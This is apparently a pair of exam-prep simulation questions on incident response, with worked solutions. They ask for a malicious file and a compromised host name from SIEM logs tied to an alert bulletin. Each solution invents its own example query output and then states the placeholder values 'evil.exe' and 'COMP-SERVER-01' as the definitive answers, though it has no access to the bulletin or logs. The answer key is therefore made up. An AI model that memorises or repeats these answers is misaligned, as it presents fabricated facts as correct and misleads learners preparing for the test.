Your enterprise has received an alert bulletin from national authorities that the network has been
compromised at approximately 11:00 PM (Absolute) on August 19, 2024. The alert is located in the
alerts folder with filename, alert_33.pdf.
What is the name of the suspected malicious file captured by keyword process.executable at 11:04
PM?
See the
solution in
Explanation.
Explanation:
To identify the name of the suspected malicious file captured by the keyword process.executable at
11:04 PM on August 19, 2024, follow these detailed steps:
Step 1: Access the Alert Bulletin
Locate the alert file:
Access the alerts folder on your system.
Look for the file named:
Open the file:
Use a PDF reader to examine the contents.
Step 2: Understand the Alert Context
The bulletin indicates that the network was compromised at around 11:00 PM.
You need to identify the malicious file specifically captured at 11:04 PM.
Step 3: Access System Logs
Use your SIEM or log management system to examine recent logs.
Filter the logs to narrow down the events:
Time Frame: August 19, 2024, from 11:00 PM to 11:10 PM.
Keyword: process.executable.
Example SIEM Query:
index=system_logs
| search "process.executable"
| where _time between "2024-08-19T23:04:00" and "2024-08-19T23:05:00"
| table _time, process_name, executable_path, hash
Step 4: Analyze Log Entries
The query result should show log entries related to the process executable that was triggered at
11:04 PM.
Focus on entries that:
Appear unusual or suspicious.
Match known indicators from the alert bulletin (alert_33.pdf).
Example Log Output:
_time
process_name executable_path
hash
2024-08-19T23:04 evil.exe
C:\Users\Public\evil.exe
4d5e6f...
Step 5: Cross-Reference with Known Threats
Check the hash of the executable file against:
VirusTotal or internal threat intelligence databases.
Cross-check the file name with indicators mentioned in the alert bulletin.
Step 6: Final Confirmation
The suspected malicious file captured at 11:04 PM is the one appearing in the log that matches the
alert details.
The name of the suspected malicious file captured by keyword process.executable at 11:04 PM is:
evil.exe
Step 7: Take Immediate Remediation Actions
Isolate the affected host to prevent further damage.
Quarantine the malicious file for analysis.
Conduct a full forensic investigation to assess the scope of the compromise.
Update threat signatures and indicators across the environment.
Step 8: Report and Document
Document the incident, including:
Time of detection: 11:04 PM on August 19, 2024.
Malicious file name: evil.exe.
Location: C:\Users\Public\evil.exe.
Generate an incident report for further investigation.
SIMULATION
Your enterprise has received an alert bulletin from national authorities that the network has been
compromised at approximately 11:00 PM (Absolute) on August 19, 2024. The alert is located in the
alerts folder with filename, alert_33.pdf.
Use the IOCs to find the compromised host. Enter the host name identified in the keyword
agent.name field below.
See the
solution in
Explanation.
Explanation:
To identify the compromised host using the keyword agent.name, follow these steps:
Step 1: Access the Alert Bulletin
Navigate to the alerts folder on your system.
Locate the alert file:
alert_33.pdf
Open the file with a PDF reader and review its contents.
Key Information to Extract:
Indicators of Compromise (IOCs) provided in the bulletin:
File hashes
IP addresses
Hostnames
Keywords related to the compromise
Step 2: Log into SIEM or Log Management System
Access your organization's SIEM or centralized log system.
Make sure you have the appropriate permissions to view log data.
Step 3: Set Up Your Search
Time Filter:
Set the time window to August 19, 2024, around 11:00 PM (Absolute).
Keyword Filter:
Use the keyword agent.name to search for host information.
IOC Correlation:
Incorporate IOCs from the alert_33.pdf file (e.g., IP addresses, hash values).
Example SIEM Query:
index=host_logs
| search "agent.name" AND (IOC_from_alert OR "2024-08-19T23:00:00")
| table _time, agent.name, host.name, ip_address, alert_id
Step 4: Analyze the Results
Review the output for any host names that appear unusual or match the IOCs from the alert bulletin.
Focus on:
Hostnames that appeared at 11:00 PM
Correlation with IOC data (hash, IP, filename)
Example Output:
_time
agent.name
host.name
ip_address
alert_id
2024-08-19T23:01 CompromisedAgent
COMP-SERVER-01 192.168.1.101 alert_33
Step 5: Verify the Host
Cross-check the host name identified in the logs with the information from alert_33.pdf.
Ensure the host name corresponds to the malicious activity noted.
The host name identified in the keyword agent.name field is: COMP-SERVER-01
Step 6: Mitigation and Response
Isolate the Compromised Host:
Remove the affected system from the network to prevent lateral movement.
Conduct Forensic Analysis:
Inspect system processes, logs, and network activity.
Patch and Update:
Apply security updates and patches.
Threat Hunting:
Look for signs of compromise in other systems using the same IOCs.
Step 7: Document and Report
Create a detailed incident report:
Date and Time: August 19, 2024, at 11:00 PM
Compromised Host Name: COMP-SERVER-01
Associated IOCs: (as per alert_33.pdf)
By following these steps, you successfully identify the compromised host and take initial steps to
contain and investigate the incident. Let me know if you need further assistance!